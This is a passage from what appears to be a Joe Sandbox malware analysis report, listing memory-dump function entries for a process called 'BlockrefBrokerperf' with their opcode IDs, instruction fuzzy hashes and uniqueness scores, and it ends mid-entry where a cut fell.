                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7eac4af0e27b23b2b9802be4a14848cab9b4977bc23c23d81f1f75b81dcbc98e
                                                              • Instruction ID: f9f1a798be4b070965c98a0d37b7e6fc18f7655e72f647f91b973a3f57f681de
                                                              • Opcode Fuzzy Hash: 7eac4af0e27b23b2b9802be4a14848cab9b4977bc23c23d81f1f75b81dcbc98e
                                                              • Instruction Fuzzy Hash: D011D612D1D4D3EEF7767F7928214BC9670AF917D0F1806FBC54E4A0D2CC4CA8815A92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b94087636efaf495ef23db33f9190814fd45523d5f015b43f6c639eeebd7bf76
                                                              • Instruction ID: 7b1bedd451bc1882b8cb91efbefb37306b62430fdd40ca41cb1b7849f76d77e0
                                                              • Opcode Fuzzy Hash: b94087636efaf495ef23db33f9190814fd45523d5f015b43f6c639eeebd7bf76
                                                              • Instruction Fuzzy Hash: DC81083150C5CA4FF779EE2898569B97BF0EFC5360B0402BBD4AEC7592D91CE8068B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26c1d7410fe6be3655b12cd283a61f74980895f2edbf1f0760ffa1f9e94f64fb
                                                              • Instruction ID: 362353a4f95eb1d8a8a22238d127a823dd6f8b8fdb0cc1773253ae9a6f6ed505
                                                              • Opcode Fuzzy Hash: 26c1d7410fe6be3655b12cd283a61f74980895f2edbf1f0760ffa1f9e94f64fb
                                                              • Instruction Fuzzy Hash: 6E91B37090895D8FEBA4EF68C495AADBBF1FF69341F10016AD00DE7292DB35A985CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 651fc785f0022cf99f0236d13a5f78fc44806d54b82a9c5e6837941db2b0b2d9
                                                              • Instruction ID: 66d2cdf8f43e5707cd764f0dc71084b42a6d29d88403d1da6380d28cf4aca058
                                                              • Opcode Fuzzy Hash: 651fc785f0022cf99f0236d13a5f78fc44806d54b82a9c5e6837941db2b0b2d9
                                                              • Instruction Fuzzy Hash: 7B81053191C6868FF779AE2894515B9BBF0EF85390F14067FD48EC3582DA2DE8028B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f21219be02e9a8dd95a5a9027bdacadd1b1a7b9c39fbc5227ae52da83198b8f
                                                              • Instruction ID: 8937286c14786217a53e4f93f5153ac7a4d629e47fc8372204435b7fb6579ac7
                                                              • Opcode Fuzzy Hash: 6f21219be02e9a8dd95a5a9027bdacadd1b1a7b9c39fbc5227ae52da83198b8f
                                                              • Instruction Fuzzy Hash: FF81F571A1CA868FF7786E285405175B7F0EF45390B94067FD08EC3692DA2DF8438B55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb4d18c075b392f50726fdc193127e549a0390031b18171b950fce86fd4c1a94
                                                              • Instruction ID: d1c04e1f8ed32a511be7f380cbefc96862d741af65e1125fe64f21c4d97f3708
                                                              • Opcode Fuzzy Hash: bb4d18c075b392f50726fdc193127e549a0390031b18171b950fce86fd4c1a94
                                                              • Instruction Fuzzy Hash: DB71A335A0C58A8FF7B8EE08C845EB437E1FF49351B1442BBD55EC75A1DA2DE8068B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44f98b4eb3812a236ffc42a58f33398ed83fede7e5a8096da82f47d247510e90
                                                              • Instruction ID: fc05d461705a9ab45b6896edcc25ebb4dbbb35313f7040ecfc90429660cd912a
                                                              • Opcode Fuzzy Hash: 44f98b4eb3812a236ffc42a58f33398ed83fede7e5a8096da82f47d247510e90
                                                              • Instruction Fuzzy Hash: 7A9147705196428FEB2DDF18D1E05B137B1FF49351B5045BEC84E8B68ADB38E892CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 156b56dfe6936bb7b29b3da2dde2c2d01293d17f533d29d556090eac165a2f4e
                                                              • Instruction ID: 363792f0f5e381827304cdb1a4d67c72522a4977d400b21fdc3217626cb4b286
                                                              • Opcode Fuzzy Hash: 156b56dfe6936bb7b29b3da2dde2c2d01293d17f533d29d556090eac165a2f4e
                                                              • Instruction Fuzzy Hash: 429169705186428FEB2CDF18D0E15B537B1FF49351B5045BEC84E8B68ADB38E892CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e82b80deb08775f2b625a9a49b6014f7cf861dd2c4c39e35db380f1889963a7
                                                              • Instruction ID: 01c0034ef6fa4260e36c1b54669ba5037b05322d1a494b934c7b7f4eb435d71a
                                                              • Opcode Fuzzy Hash: 8e82b80deb08775f2b625a9a49b6014f7cf861dd2c4c39e35db380f1889963a7
                                                              • Instruction Fuzzy Hash: C7717E30D1D68A9EEB75FF6488546BCBBB0FF59380F1009BAD00ED3195DA2CA9418B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b94f3df3711dd56333e2281b10e47d7ef3c2e850cee7593cd122a7f408fbbae1
                                                              • Instruction ID: 5355c60cae8895683addc74368cd3fd02abcce6faa33f076f609fe32c27b22a2
                                                              • Opcode Fuzzy Hash: b94f3df3711dd56333e2281b10e47d7ef3c2e850cee7593cd122a7f408fbbae1
                                                              • Instruction Fuzzy Hash: 37817830A4DB868FF3B9EE28C19597177B1FF04354B54057EC48E87A96EA2DF8428B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 844501ea87d786dad168043f993dc5f977e3555341f95186489e2feba07c1111
                                                              • Instruction ID: e6c2998e5370a61975d8e009b28c7e75b3734334d96f55e72b4765bc2d9ae2f3
                                                              • Opcode Fuzzy Hash: 844501ea87d786dad168043f993dc5f977e3555341f95186489e2feba07c1111
                                                              • Instruction Fuzzy Hash: 2781753091CB868FE379EE18C091561BBB1FF44794B64097AC48F87A96CA7DF842CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9ed8fa07d8e13f5ab115a5f1674e113223c30901aaa4240df2a8e72115e593c
                                                              • Instruction ID: b2159dbef8e1207fbffc1c4c2b07569ce9188bff9a9e63e9be418c0ccc689129
                                                              • Opcode Fuzzy Hash: f9ed8fa07d8e13f5ab115a5f1674e113223c30901aaa4240df2a8e72115e593c
                                                              • Instruction Fuzzy Hash: 8951217160DB894FE769AE2898865707BF0EF563A075502BFC08EC71A3D929F847CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6a752edca684adc5dc06db8304e0cc289dbd9772efcc9ceba5f05b6bd9d04a4
                                                              • Instruction ID: 3ebbef2c9debd0a1c595658006dbc79fc0a01bec3e66455205c3f7f4a91f5f7c
                                                              • Opcode Fuzzy Hash: f6a752edca684adc5dc06db8304e0cc289dbd9772efcc9ceba5f05b6bd9d04a4
                                                              • Instruction Fuzzy Hash: B861AC70D1D68A9EFBB5EF6888546BDBBB2FF44380F5001BAD00ED7191DA2CA841CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f6841bc62082e555bbb8c38f41440786a6bcbd3b78d7731511742d327ea91747
                                                              • Instruction ID: 06368dd3cf49e371ed93cb3cfae1f0442240f7e0aae9298fe91efa1218e32fb4
                                                              • Opcode Fuzzy Hash: f6841bc62082e555bbb8c38f41440786a6bcbd3b78d7731511742d327ea91747
                                                              • Instruction Fuzzy Hash: 9361C872C1F2D29FF262BA7868620E93BB0EF0626DF1801B7D09D8E0D3ED1C64468655
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f7a32c3d58c6f9f04dad8b50b28a667d80eaad7203538bf4daae2bfe0dd3139
                                                              • Instruction ID: f60c03c434db38dcda4b13c1fc1451c9bf236d801facc2b73c2a92a1fee2bde8
                                                              • Opcode Fuzzy Hash: 1f7a32c3d58c6f9f04dad8b50b28a667d80eaad7203538bf4daae2bfe0dd3139
                                                              • Instruction Fuzzy Hash: 00514A70E08A5D8FDB95EF68D895AEDBBB1FF58340F14016AD00DE7252DB38A981CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb2bfe008641e1b434b39f41df589b4baaed51f17ac1eed4ccc8763d7f63c2d0
                                                              • Instruction ID: fcf8aeb1d055e0eed09d59585f6d42bc4e5010df36f2730623cae38e5e2a564f
                                                              • Opcode Fuzzy Hash: cb2bfe008641e1b434b39f41df589b4baaed51f17ac1eed4ccc8763d7f63c2d0
                                                              • Instruction Fuzzy Hash: FF51B371D1E6D99FEB61FB78A8604E93BB0EF45364F0402BBD04DCA193DA2CA805CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8011ea0e4c17b0b3ca684a5205eb2981c9079bf976969c16e4f4b99e592196c0
                                                              • Instruction ID: 2d25d4b69cd3b33ae88583e42dab6cc2325bfa5831a1838651dba14af9ea057f
                                                              • Opcode Fuzzy Hash: 8011ea0e4c17b0b3ca684a5205eb2981c9079bf976969c16e4f4b99e592196c0
                                                              • Instruction Fuzzy Hash: 3F51D962C1E2D69FF266BA3828620F93BB0EF1626DF1801B7D09D8E0C3ED0D64468655
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba931f666e062c01477332701d55c1ac1b09561e39d6818dce98e7df060ee146
                                                              • Instruction ID: 147eab39cf9dfbbd4bf54b01ff1c6f849e8c85cd226de8e1d2fdc5a532375f11
                                                              • Opcode Fuzzy Hash: ba931f666e062c01477332701d55c1ac1b09561e39d6818dce98e7df060ee146
                                                              • Instruction Fuzzy Hash: 4F41D762D0F2D69FF276BA3828651F93BA0AF56699F1901F7C09E8B0C3DC0C28454796
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3164f3fc483bb3cd97813725111c41a98a5db4dff349e22bab6ee5ec5247f863
                                                              • Instruction ID: d26ae45ef27f49f68c643d5b42984414f78240f0aca00f1900b3ab681225a882
                                                              • Opcode Fuzzy Hash: 3164f3fc483bb3cd97813725111c41a98a5db4dff349e22bab6ee5ec5247f863
                                                              • Instruction Fuzzy Hash: 31412570D1C5AE8FF779AA288464AB877B5FF54340F1441BBC04EC7586DE3CA8869B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6761644a44785cbf448e83ed173388761359e779ef6165cb7ebc8ef257bd7dc3
                                                              • Instruction ID: b940f85d230a8f7a3f4db16b1e2dce6a48ae64429de69b223d7baa2833c69049
                                                              • Opcode Fuzzy Hash: 6761644a44785cbf448e83ed173388761359e779ef6165cb7ebc8ef257bd7dc3
                                                              • Instruction Fuzzy Hash: 1E41B67160C9499FDB99FF2CC4559A5B7F1FBA8314B0401AED10ED3282CE39E855CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93cd74e8039307a55ff68026d64305d8c6d9d8d33d05cb463fdd5044e98916ed
                                                              • Instruction ID: b476ea60eb43b7c2fa0384fe568dabefcf2462f91365615e1157cf4f4fd39479
                                                              • Opcode Fuzzy Hash: 93cd74e8039307a55ff68026d64305d8c6d9d8d33d05cb463fdd5044e98916ed
                                                              • Instruction Fuzzy Hash: A4415071A0C9499FDBA8FF1CC495DA5B7E5FBA9314B0401AAD10ED3192DE38E885CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 228a8052c9944c45bd99d391a6ca260bd25c9639fb96595fc7705495fe735c3b
                                                              • Instruction ID: fad65aa3b831e41fce19909cb99d559ae45597adb1a380af93c6176471a39416
                                                              • Opcode Fuzzy Hash: 228a8052c9944c45bd99d391a6ca260bd25c9639fb96595fc7705495fe735c3b
                                                              • Instruction Fuzzy Hash: 1A41A130D1C9AA8EF779EB6884546B877B1FF64340F1445BAC04EC75C6DE3CA9858B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86ac57139805ec029663edba1dd705ca806c6a8d276defd0c93ede0f2434b2a8
                                                              • Instruction ID: baab755860f5879ce0874ed1be0f1dd435c2e315c304098813081d53b8f37fe1
                                                              • Opcode Fuzzy Hash: 86ac57139805ec029663edba1dd705ca806c6a8d276defd0c93ede0f2434b2a8
                                                              • Instruction Fuzzy Hash: 2231B37160C9588FDB99EF2CC0559A477F1FBA9314B0401AED00ED7292CE29E841CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24874cae0937ef057515a6c2f44bbb4956f0c3d419d73136ea052383290541a7
                                                              • Instruction ID: 05cbb9af217cfbda8ab918a436965e21074f73c157012cc5fcb5173e99b36c61
                                                              • Opcode Fuzzy Hash: 24874cae0937ef057515a6c2f44bbb4956f0c3d419d73136ea052383290541a7
                                                              • Instruction Fuzzy Hash: 2131937160C9499FDBA9FF2CC055DA5B7E5FBA9314B0401AED04ED7192DE28E881CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 092af4f05a99cbf88a75df10f7999d7e0c594ba5c1ff282e28dbed1e717ff485
                                                              • Instruction ID: 32a306b0dae857c604444cc69bc9b73d2164e8fbac31ee349965ed4eaf3386b0
                                                              • Opcode Fuzzy Hash: 092af4f05a99cbf88a75df10f7999d7e0c594ba5c1ff282e28dbed1e717ff485
                                                              • Instruction Fuzzy Hash: 28312730C1C5FACEE779AA188424AF477A1FF69341F5846BAC04FCB1C6DD2CA9858B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5772d2ecc8e15b32a50c06db2a7c95c7dcfa4f0d330763e7fba9ce006315f3d6
                                                              • Instruction ID: 3d7015423f3516f4d36fcc81ba90444b90815a1d156dc4b680706406d2992b76
                                                              • Opcode Fuzzy Hash: 5772d2ecc8e15b32a50c06db2a7c95c7dcfa4f0d330763e7fba9ce006315f3d6
                                                              • Instruction Fuzzy Hash: E931937160C9499FDBA9FF2CC055AA5B7F1FB69314B0401AED00ED7292CE29E885CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb84e03e64018d9b0c0648b2999dfca154ccd8ce6e725ca77182f2387aa53afe
                                                              • Instruction ID: 2d5073db5f34c46dc69c4583714ecad0c615426241e7580a1d477bd3a03132a2
                                                              • Opcode Fuzzy Hash: eb84e03e64018d9b0c0648b2999dfca154ccd8ce6e725ca77182f2387aa53afe
                                                              • Instruction Fuzzy Hash: B231617160C9499FDBA8FF28C055DA5B7E5FBA9714B0401AED00ED7192DE38E885CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48d9fb33146bb741e146f8aaf7068432a37ed7a82383b8b7d9aa8546210049d9
                                                              • Instruction ID: 02d8f6a0662268942f70191973e630a33aaa027041679794f9c3451af4812b87
                                                              • Opcode Fuzzy Hash: 48d9fb33146bb741e146f8aaf7068432a37ed7a82383b8b7d9aa8546210049d9
                                                              • Instruction Fuzzy Hash: 8A314071E1C99A8FEB68EE58D4519A8F3F1FF54750B54413AD00ED3286DF28BC128B84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d01f0ce07e9d2e044d2d27e68df1e3b105aed3d651b89cf52a5af53a0d2afaf
                                                              • Instruction ID: dd878e8bc4364377f4e58dcc5906b0770d9da277793054afcb8a93476fa1cef6
                                                              • Opcode Fuzzy Hash: 2d01f0ce07e9d2e044d2d27e68df1e3b105aed3d651b89cf52a5af53a0d2afaf
                                                              • Instruction Fuzzy Hash: F531C77092C58A8FEBB8EF5484956BD7BB1FF44780F5001BBD40FD6581DA3CA9409B85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6421c07c51fd4d0e1967ba7f7c37636cd869f9bedbc8d43406885788d0a5680d
                                                              • Instruction ID: 122637947ff23938fd28f9e3c482b05a1c4ba645392b97dd4b0945703b66e68a
                                                              • Opcode Fuzzy Hash: 6421c07c51fd4d0e1967ba7f7c37636cd869f9bedbc8d43406885788d0a5680d
                                                              • Instruction Fuzzy Hash: 2431167591C9CAAEEBB8EF5884556BD7BB0FF54380F50017BD80ED6181CA3DA8608F81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb0bc4598f402f59d95ebf5d4ccf5127656a3e759b8929780ed588b00262a3b1
                                                              • Instruction ID: 79797369e0487eac947cb4d6d3a9930732a5c5b874c0f8f95d813a9955c39b65
                                                              • Opcode Fuzzy Hash: fb0bc4598f402f59d95ebf5d4ccf5127656a3e759b8929780ed588b00262a3b1
                                                              • Instruction Fuzzy Hash: AA31025081C5D64FF33AAB6848645B47F71EF6238071886FBC49E8B5D7C92CE886CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab128c5bff250ee8ba6f255384a7847c7a9f72cb23ab73261f563cae7fa82c28
                                                              • Instruction ID: 399701c3ce3332ada1504ba01d82d1869c7b31be85209e4962b204f46f45e260
                                                              • Opcode Fuzzy Hash: ab128c5bff250ee8ba6f255384a7847c7a9f72cb23ab73261f563cae7fa82c28
                                                              • Instruction Fuzzy Hash: 7A31C370D1C98ECEEBA8EF5884559BD76B1FF58780F5001BAE41EE2180CB3D6950DA41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a822a3a2e05d4f2607759bea8d8bfc954176a809499ebfe304928b7002b486a
